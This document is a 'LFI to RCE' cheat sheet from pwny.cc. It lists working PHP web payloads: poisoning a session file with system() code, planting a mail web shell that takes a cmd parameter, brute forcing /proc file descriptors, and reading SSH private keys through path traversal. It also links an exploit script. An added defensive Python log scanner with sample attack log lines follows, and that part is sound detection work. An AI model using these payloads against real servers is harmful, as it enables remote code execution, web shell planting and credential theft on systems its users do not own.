pwny.cc
LFI to RCE

Php sessions method

#Check if the website uses PHP
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Tue, 30-Jun-2020 10:25:29 GMT; path=/; httponly

#In PHP, sessions are stored in /var/lib/php5/sess_PHPSESSID files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

#Poison the session: set the user parameter to <?php system("whoami"); ?>
login=1&user=<?php system("whoami");?>&pass=password&lang=en_us.php

#Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Email method

#Send a mail to an internal account ([email protected]) containing:
<?php echo system($_REQUEST["cmd"]); ?>
#Access the mailbox through the LFI (/var/mail/USER&cmd=whoami)

/proc/*/fd/* method

#Upload a lot of shells
http://web.com/index.php?page=/proc/$PID/fd/$FD
#$PID = PID of the process (can be bruteforced)
#$FD = file descriptor (can be bruteforced)

Ssh method

#Check which user is being used (/proc/self/status - /etc/passwd)
/home/hax0r/.ssh/id_rsa #hax0r = the user being used

Phpinfo() method

To exploit this you need: a page where phpinfo() is displayed, "file_uploads=on", and a server that is able to write to the "/tmp" directory.
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
Script to exploit Phpinfo() method
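As a defender's counterpart to the methods above, here is an added example (not from pwny.cc) in Python that scans the query strings in access-log lines for the include targets and traversal patterns these methods rely on; the log lines, IP address and timestamps are constructed samples.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include targets this page shows being reached through an LFI; a parameter
# value that resolves to one of them, or that carries a PHP open tag
# (session poisoning), is what to alert on.
SENSITIVE_PATHS = (
    "/var/lib/php5/sess_",  # PHP session files
    "/var/mail/",           # local mailboxes
    "/proc/",               # /proc/<pid>/fd/<fd>
    "/.ssh/id_rsa",         # SSH private keys
    "/etc/passwd",
)
TRAVERSAL = re.compile(r"\.\.[/\\]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo nested URL encoding so %252e%252e%252f is also seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_params(params: dict) -> list:
    """One finding per suspicious parameter; an empty list means the request looks clean."""
    findings = []
    for key, raw in params.items():
        value = fully_decode(raw)
        if TRAVERSAL.search(value):
            findings.append(f"{key}: path traversal")
        findings.extend(f"{key}: reaches {p}" for p in SENSITIVE_PATHS if p in value)
        if "<?php" in value.lower():
            findings.append(f"{key}: PHP code in parameter")
    return findings

def scan_log_line(line: str) -> list:
    """Extract the query string from a combined-format access log line and scan it."""
    match = REQUEST.search(line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    return scan_params(dict(parse_qsl(query, keep_blank_values=True)))

SAMPLE_LOG = [  # constructed sample lines, not from any real server
    '10.0.0.5 - - [30/Jun/2020:10:25:29 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.5 - - [30/Jun/2020:10:25:41 +0000] "GET /index.php?lang=/../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 HTTP/1.1" 200 88',
    '10.0.0.5 - - [30/Jun/2020:10:26:02 +0000] "GET /index.php?page=/proc/self/fd/7 HTTP/1.1" 404 0',
    '10.0.0.5 - - [30/Jun/2020:10:26:30 +0000] "GET /index.php?page=%2fvar%2fmail%2fwww-data&cmd=id HTTP/1.1" 200 310',
]
```

Run scan_log_line over each entry of SAMPLE_LOG (or over a real access log): the first sample comes back clean, the other three return the parameter and the target they reach. Session-poisoning payloads travel in the POST body, so feed scan_params the parsed body when you have one.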